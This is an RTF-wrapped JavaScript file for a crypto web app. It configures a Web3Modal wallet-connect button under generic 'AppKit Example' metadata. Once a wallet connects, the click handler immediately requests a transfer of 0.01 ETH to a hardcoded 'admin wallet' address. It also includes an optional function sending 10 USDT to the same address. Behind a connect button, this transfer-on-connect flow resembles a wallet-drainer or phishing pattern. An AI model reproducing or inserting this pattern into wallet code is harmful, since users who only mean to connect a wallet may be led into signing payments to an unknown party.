{\rtf1\ansi\ansicpg1252\cocoartf2759
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 Menlo-Regular;}
{\colortbl;\red255\green255\blue255;\red183\green111\blue179;\red24\green24\blue24;\red193\green193\blue193;
\red140\green211\blue254;\red194\green126\blue101;\red89\green138\blue67;\red70\green137\blue204;\red66\green179\blue255;
\red202\green202\blue202;\red212\green214\blue154;\red67\green192\blue160;}
{\*\expandedcolortbl;;\cssrgb\c77255\c52549\c75294;\cssrgb\c12157\c12157\c12157;\cssrgb\c80000\c80000\c80000;
\cssrgb\c61176\c86275\c99608;\cssrgb\c80784\c56863\c47059;\cssrgb\c41569\c60000\c33333;\cssrgb\c33725\c61176\c83922;\cssrgb\c30980\c75686\c100000;
\cssrgb\c83137\c83137\c83137;\cssrgb\c86275\c86275\c66667;\cssrgb\c30588\c78824\c69020;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs24 \cf2 \cb3 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 import\cf4 \strokec4  \{ \cf5 \strokec5 createWeb3Modal\cf4 \strokec4 , \cf5 \strokec5 defaultWagmiConfig\cf4 \strokec4  \} \cf2 \strokec2 from\cf4 \strokec4  \cf6 \strokec6 '@web3modal/wagmi'\cf4 \strokec4 ;\cb1 \
\cf2 \cb3 \strokec2 import\cf4 \strokec4  \{ \cf5 \strokec5 mainnet\cf4 \strokec4 , \cf5 \strokec5 arbitrum\cf4 \strokec4  \} \cf2 \strokec2 from\cf4 \strokec4  \cf6 \strokec6 'viem/chains'\cf4 \strokec4 ;\cb1 \
\cf2 \cb3 \strokec2 import\cf4 \strokec4  \{ \cf5 \strokec5 reconnect\cf4 \strokec4  \} \cf2 \strokec2 from\cf4 \strokec4  \cf6 \strokec6 '@wagmi/core'\cf4 \strokec4 ;\cb1 \
\cf2 \cb3 \strokec2 import\cf4 \strokec4  \{ \cf5 \strokec5 ethers\cf4 \strokec4  \} \cf2 \strokec2 from\cf4 \strokec4  \cf6 \strokec6 'ethers'\cf4 \strokec4 ;\cb1 \
\cf2 \cb3 \strokec2 import\cf4 \strokec4  \cf5 \strokec5 USDTAbi\cf4 \strokec4  \cf2 \strokec2 from\cf4 \strokec4  \cf6 \strokec6 './abi/USDTAbi.json'\cf4 \strokec4 ; \cf7 \strokec7 // Ensure the correct path\cf4 \cb1 \strokec4 \
\
\pard\pardeftab720\partightenfactor0
\cf7 \cb3 \strokec7 // 1. Get a project ID at https://cloud.walletconnect.com\cf4 \cb1 \strokec4 \
\pard\pardeftab720\partightenfactor0
\cf8 \cb3 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 projectId\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf6 \strokec6 '5f4a2157ddcb88b25550a0d8e40d07ec'\cf4 \strokec4 ;\cb1 \
\
\pard\pardeftab720\partightenfactor0
\cf7 \cb3 \strokec7 // 2. Create wagmiConfig\cf4 \cb1 \strokec4 \
\pard\pardeftab720\partightenfactor0
\cf8 \cb3 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 metadata\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \{\cb1 \
\pard\pardeftab720\partightenfactor0
\cf4 \cb3     \cf5 \strokec5 name:\cf4 \strokec4  \cf6 \strokec6 'AppKit'\cf4 \strokec4 ,\cb1 \
\cb3     \cf5 \strokec5 description:\cf4 \strokec4  \cf6 \strokec6 'AppKit Example'\cf4 \strokec4 ,\cb1 \
\cb3     \cf5 \strokec5 url:\cf4 \strokec4  \cf6 \strokec6 'https://dapp.zaqcargo.com'\cf4 \strokec4 ,\cb1 \
\cb3     \cf5 \strokec5 icons:\cf4 \strokec4  [\cf6 \strokec6 'https://avatars.githubusercontent.com/u/37784886'\cf4 \strokec4 ]\cb1 \
\cb3 \};\cb1 \
\
\pard\pardeftab720\partightenfactor0
\cf8 \cb3 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 chains\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  [\cf9 \strokec9 mainnet\cf4 \strokec4 , \cf9 \strokec9 arbitrum\cf4 \strokec4 ];\cb1 \
\cf8 \cb3 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 config\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf11 \strokec11 defaultWagmiConfig\cf4 \strokec4 (\{\cb1 \
\pard\pardeftab720\partightenfactor0
\cf4 \cb3     \cf5 \strokec5 chains\cf4 \strokec4 ,\cb1 \
\cb3     \cf5 \strokec5 projectId\cf4 \strokec4 ,\cb1 \
\cb3     \cf5 \strokec5 metadata\cf4 \strokec4 ,\cb1 \
\cb3 \});\cb1 \
\
\pard\pardeftab720\partightenfactor0
\cf11 \cb3 \strokec11 reconnect\cf4 \strokec4 (\cf9 \strokec9 config\cf4 \strokec4 );\cb1 \
\
\pard\pardeftab720\partightenfactor0
\cf7 \cb3 \strokec7 // 3. Create Web3Modal\cf4 \cb1 \strokec4 \
\pard\pardeftab720\partightenfactor0
\cf8 \cb3 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 modal\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf11 \strokec11 createWeb3Modal\cf4 \strokec4 (\{\cb1 \
\pard\pardeftab720\partightenfactor0
\cf4 \cb3     \cf5 \strokec5 wagmiConfig:\cf4 \strokec4  \cf9 \strokec9 config\cf4 \strokec4 ,\cb1 \
\cb3     \cf5 \strokec5 projectId\cf4 \strokec4 ,\cb1 \
\cb3 \});\cb1 \
\
\pard\pardeftab720\partightenfactor0
\cf7 \cb3 \strokec7 // 4. Function to transfer ETH\cf4 \cb1 \strokec4 \
\pard\pardeftab720\partightenfactor0
\cf8 \cb3 \strokec8 async\cf4 \strokec4  \cf8 \strokec8 function\cf4 \strokec4  \cf11 \strokec11 transferETH\cf4 \strokec4 () \{\cb1 \
\pard\pardeftab720\partightenfactor0
\cf4 \cb3     \cf2 \strokec2 try\cf4 \strokec4  \{\cb1 \
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 provider\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf8 \strokec8 new\cf4 \strokec4  \cf5 \strokec5 ethers\cf4 \strokec4 .\cf12 \strokec12 BrowserProvider\cf4 \strokec4 (\cf5 \strokec5 window\cf4 \strokec4 .\cf5 \strokec5 ethereum\cf4 \strokec4 ); \cf7 \strokec7 // Replaced Web3Provider with BrowserProvider\cf4 \cb1 \strokec4 \
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 signer\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf2 \strokec2 await\cf4 \strokec4  \cf9 \strokec9 provider\cf4 \strokec4 .\cf11 \strokec11 getSigner\cf4 \strokec4 ();\cb1 \
\
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 adminWallet\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf6 \strokec6 '0x9ee95b2da1016e470140e751fae1e6ddae155e5b'\cf4 \strokec4 ; \cf7 \strokec7 // Admin wallet address\cf4 \cb1 \strokec4 \
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 amountInEth\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf6 \strokec6 '0.01'\cf4 \strokec4 ; \cf7 \strokec7 // Amount of ETH to send\cf4 \cb1 \strokec4 \
\
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 tx\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf2 \strokec2 await\cf4 \strokec4  \cf9 \strokec9 signer\cf4 \strokec4 .\cf11 \strokec11 sendTransaction\cf4 \strokec4 (\{\cb1 \
\cb3             \cf5 \strokec5 to:\cf4 \strokec4  \cf9 \strokec9 adminWallet\cf4 \strokec4 ,\cb1 \
\cb3             \cf5 \strokec5 value:\cf4 \strokec4  \cf5 \strokec5 ethers\cf4 \strokec4 .\cf11 \strokec11 parseEther\cf4 \strokec4 (\cf9 \strokec9 amountInEth\cf4 \strokec4 ), \cf7 \strokec7 // ethers.utils.parseEther is now ethers.parseEther\cf4 \cb1 \strokec4 \
\cb3         \});\cb1 \
\
\cb3         \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 log\cf4 \strokec4 (\cf6 \strokec6 'ETH Transaction hash:'\cf4 \strokec4 , \cf9 \strokec9 tx\cf4 \strokec4 .\cf9 \strokec9 hash\cf4 \strokec4 );\cb1 \
\cb3     \} \cf2 \strokec2 catch\cf4 \strokec4  (\cf5 \strokec5 error\cf4 \strokec4 ) \{\cb1 \
\cb3         \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 error\cf4 \strokec4 (\cf6 \strokec6 'Error sending ETH:'\cf4 \strokec4 , \cf5 \strokec5 error\cf4 \strokec4 );\cb1 \
\cb3     \}\cb1 \
\cb3 \}\cb1 \
\
\pard\pardeftab720\partightenfactor0
\cf7 \cb3 \strokec7 // 5. Function to transfer USDT\cf4 \cb1 \strokec4 \
\pard\pardeftab720\partightenfactor0
\cf8 \cb3 \strokec8 async\cf4 \strokec4  \cf8 \strokec8 function\cf4 \strokec4  \cf11 \strokec11 transferUSDT\cf4 \strokec4 () \{\cb1 \
\pard\pardeftab720\partightenfactor0
\cf4 \cb3     \cf2 \strokec2 try\cf4 \strokec4  \{\cb1 \
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 provider\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf8 \strokec8 new\cf4 \strokec4  \cf5 \strokec5 ethers\cf4 \strokec4 .\cf12 \strokec12 BrowserProvider\cf4 \strokec4 (\cf5 \strokec5 window\cf4 \strokec4 .\cf5 \strokec5 ethereum\cf4 \strokec4 ); \cf7 \strokec7 // Replaced Web3Provider with BrowserProvider\cf4 \cb1 \strokec4 \
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 signer\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf2 \strokec2 await\cf4 \strokec4  \cf9 \strokec9 provider\cf4 \strokec4 .\cf11 \strokec11 getSigner\cf4 \strokec4 ();\cb1 \
\
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 usdtContractAddress\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf6 \strokec6 '0xdAC17F958D2ee523a2206206994597C13D831ec7'\cf4 \strokec4 ; \cf7 \strokec7 // USDT contract address\cf4 \cb1 \strokec4 \
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 adminWallet\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf6 \strokec6 '0x9ee95b2da1016e470140e751fae1e6ddae155e5b'\cf4 \strokec4 ; \cf7 \strokec7 // Admin wallet address\cf4 \cb1 \strokec4 \
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 amountInUsdt\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf5 \strokec5 ethers\cf4 \strokec4 .\cf11 \strokec11 toBigInt\cf4 \strokec4 (\cf6 \strokec6 '10000000'\cf4 \strokec4 ); \cf7 \strokec7 // 10 USDT (converted to BigInt for v6)\cf4 \cb1 \strokec4 \
\
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 usdtContract\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf8 \strokec8 new\cf4 \strokec4  \cf5 \strokec5 ethers\cf4 \strokec4 .\cf12 \strokec12 Contract\cf4 \strokec4 (\cf9 \strokec9 usdtContractAddress\cf4 \strokec4 , \cf5 \strokec5 USDTAbi\cf4 \strokec4 , \cf9 \strokec9 signer\cf4 \strokec4 );\cb1 \
\
\cb3         \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 tx\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf2 \strokec2 await\cf4 \strokec4  \cf9 \strokec9 usdtContract\cf4 \strokec4 .\cf11 \strokec11 transfer\cf4 \strokec4 (\cf9 \strokec9 adminWallet\cf4 \strokec4 , \cf9 \strokec9 amountInUsdt\cf4 \strokec4 );\cb1 \
\cb3         \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 log\cf4 \strokec4 (\cf6 \strokec6 'USDT Transaction hash:'\cf4 \strokec4 , \cf9 \strokec9 tx\cf4 \strokec4 .\cf5 \strokec5 hash\cf4 \strokec4 );\cb1 \
\cb3     \} \cf2 \strokec2 catch\cf4 \strokec4  (\cf5 \strokec5 error\cf4 \strokec4 ) \{\cb1 \
\cb3         \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 error\cf4 \strokec4 (\cf6 \strokec6 'Error sending USDT:'\cf4 \strokec4 , \cf5 \strokec5 error\cf4 \strokec4 );\cb1 \
\cb3     \}\cb1 \
\cb3 \}\cb1 \
\
\pard\pardeftab720\partightenfactor0
\cf7 \cb3 \strokec7 // 6. Handle the button click to open Web3Modal\cf4 \cb1 \strokec4 \
\pard\pardeftab720\partightenfactor0
\cf8 \cb3 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 button\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf5 \strokec5 document\cf4 \strokec4 .\cf11 \strokec11 getElementById\cf4 \strokec4 (\cf6 \strokec6 'custom-web3-button'\cf4 \strokec4 );\cb1 \
\pard\pardeftab720\partightenfactor0
\cf2 \cb3 \strokec2 if\cf4 \strokec4  (\cf9 \strokec9 button\cf4 \strokec4 ) \{\cb1 \
\pard\pardeftab720\partightenfactor0
\cf4 \cb3     \cf9 \strokec9 button\cf4 \strokec4 .\cf11 \strokec11 addEventListener\cf4 \strokec4 (\cf6 \strokec6 'click'\cf4 \strokec4 , \cf8 \strokec8 async\cf4 \strokec4  () \cf8 \strokec8 =>\cf4 \strokec4  \{\cb1 \
\cb3         \cf2 \strokec2 try\cf4 \strokec4  \{\cb1 \
\cb3             \cf7 \strokec7 // Open the Web3Modal when the button is clicked\cf4 \cb1 \strokec4 \
\cb3             \cf2 \strokec2 await\cf4 \strokec4  \cf9 \strokec9 modal\cf4 \strokec4 .\cf11 \strokec11 open\cf4 \strokec4 (); \cb1 \
\
\cb3             \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 log\cf4 \strokec4 (\cf6 \strokec6 'Ethers:'\cf4 \strokec4 , \cf5 \strokec5 ethers\cf4 \strokec4 );\cb1 \
\cb3             \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 log\cf4 \strokec4 (\cf6 \strokec6 'window.ethereum:'\cf4 \strokec4 , \cf5 \strokec5 window\cf4 \strokec4 .\cf5 \strokec5 ethereum\cf4 \strokec4 );\cb1 \
\
\cb3             \cf7 \strokec7 // Check if Ethereum provider is available\cf4 \cb1 \strokec4 \
\cb3             \cf2 \strokec2 if\cf4 \strokec4  (\cf5 \strokec5 window\cf4 \strokec4 .\cf5 \strokec5 ethereum\cf4 \strokec4 ) \{\cb1 \
\cb3                 \cf7 \strokec7 // Create a BrowserProvider\cf4 \cb1 \strokec4 \
\cb3                 \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 provider\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf8 \strokec8 new\cf4 \strokec4  \cf5 \strokec5 ethers\cf4 \strokec4 .\cf12 \strokec12 BrowserProvider\cf4 \strokec4 (\cf5 \strokec5 window\cf4 \strokec4 .\cf5 \strokec5 ethereum\cf4 \strokec4 );\cb1 \
\
\cb3                 \cf7 \strokec7 // Ensure the signer is available and get the wallet address\cf4 \cb1 \strokec4 \
\cb3                 \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 signer\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf2 \strokec2 await\cf4 \strokec4  \cf9 \strokec9 provider\cf4 \strokec4 .\cf11 \strokec11 getSigner\cf4 \strokec4 ();\cb1 \
\cb3                 \cf8 \strokec8 const\cf4 \strokec4  \cf9 \strokec9 address\cf4 \strokec4  \cf10 \strokec10 =\cf4 \strokec4  \cf2 \strokec2 await\cf4 \strokec4  \cf9 \strokec9 signer\cf4 \strokec4 .\cf11 \strokec11 getAddress\cf4 \strokec4 ();\cb1 \
\cb3                 \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 log\cf4 \strokec4 (\cf6 \strokec6 'Wallet connected:'\cf4 \strokec4 , \cf5 \strokec5 address\cf4 \strokec4 );\cb1 \
\
\cb3                 \cf7 \strokec7 // After connecting, perform the desired transfer\cf4 \cb1 \strokec4 \
\cb3                 \cf2 \strokec2 await\cf4 \strokec4  \cf11 \strokec11 transferETH\cf4 \strokec4 (); \cf7 \strokec7 // Uncomment to transfer ETH\cf4 \cb1 \strokec4 \
\cb3                 \cf7 \strokec7 // await transferUSDT(); // Uncomment to transfer USDT\cf4 \cb1 \strokec4 \
\cb3             \} \cf2 \strokec2 else\cf4 \strokec4  \{\cb1 \
\cb3                 \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 error\cf4 \strokec4 (\cf6 \strokec6 'Ethereum provider not found'\cf4 \strokec4 );\cb1 \
\cb3             \}\cb1 \
\cb3         \} \cf2 \strokec2 catch\cf4 \strokec4  (\cf5 \strokec5 error\cf4 \strokec4 ) \{\cb1 \
\cb3             \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 error\cf4 \strokec4 (\cf6 \strokec6 'Error during modal open or transfer:'\cf4 \strokec4 , \cf5 \strokec5 error\cf4 \strokec4 );\cb1 \
\cb3         \}\cb1 \
\cb3     \});\cb1 \
\cb3 \} \cf2 \strokec2 else\cf4 \strokec4  \{\cb1 \
\cb3     \cf5 \strokec5 console\cf4 \strokec4 .\cf11 \strokec11 error\cf4 \strokec4 (\cf6 \strokec6 'Custom Web3 button not found'\cf4 \strokec4 );\cb1 \
\cb3 \}\cb1 \
\
}